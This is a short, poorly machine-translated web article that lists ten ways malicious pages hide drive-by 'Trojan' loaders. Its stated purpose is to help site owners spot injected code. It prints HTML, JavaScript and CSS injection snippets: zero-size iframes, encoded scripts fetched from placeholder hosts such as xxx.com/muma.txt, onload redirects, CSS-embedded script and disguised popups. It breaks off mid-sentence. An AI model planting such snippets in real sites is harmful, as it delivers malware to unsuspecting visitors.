Summary of common Asp Trojans

I. Frame Trojans

<Iframe src = address width = 0 height = 0> </iframe>

You can enter malicious website links at "addresses ".

Ii. js file Trojans

As long as it is a JS file, it can be maliciously modified to be mounted with malicious code. Generally, JavaScript code referenced by the entire site is the most vulnerable to Trojans, we can check the left or bottom of the JS Code for detection. The bad guys like to hide the malicious code with a lot of spaces or carriage returns between it and the normal code, therefore, you should check whether the JS Code page has been deliberately stretched.

Iii. js deformation Encryption

<SCRIPT language = "JScript. Encode" src = http://www.xxx.com/muma.txt> </script>
You can change muma.txt to any suffix.

4. body Trojans

<Body onload = "window. location = 'address';"> </body>

V. Hidden Trojans

Top.doc ument. body. innerHTML = top.doc ument. body. innerHTML + '\ r \ n <iframe src = "http://www.xxx.com/muma.htm/"> </iframe> ';

6. Trojan mounting in css

Body {
Background-image: url ('javascript: document. write ("<script src = http://www.XXX.net/muma.js> </script> ")')}

This method is hard to find.

7. JAJA Trojans

<SCRIPT language = javascript>
Window. open ("Address", "", "toolbar = no, location = no, directories = no, status = no, menubar = no, scro llbars = no, width = 1, height = 1 ");
</Script>

8. Image disguise

<Html>
<Iframe src = "Network horse address" height = 0 width = 0> </iframe>
</center>
</Html>

9. Disguised call

<Frameset rows = "444,0" cols = "*">
<Frame src = "Open webpage" framborder = "no" scrolling = "auto" noresize marginwidth = "0" margingheight = "0">
<Frame src = "Network horse address" frameborder = "no" scrolling = "no" noresize marginwidth = "0" margingheight = "0">
</Frameset>

10: Advanced Spoofing

<A href = "http://www.163.com (confusing connection address that points to Trojan address)" onMouseOver = "www_163_com (); return true;"> content to be displayed on the page </a>
<SCRIPT Language = "JavaScript">
Function www_163_com ()
{
Var url = "Network horse address ";
Open (url, "NewWindow", "toolbar = no, location = no, directories = no, status = no, menubar = no, scrollbars = no, resizable = no, copyhistory = yes, width = 800, height = 600, left = 10, top = 10 ");
}
</SCRIPT>

How to discover the above behavior. If multiple pages have Trojan code, you need a batch replacement tool. We recommend that you use

Download the script home server channel (for more software, go to s.jb51.net)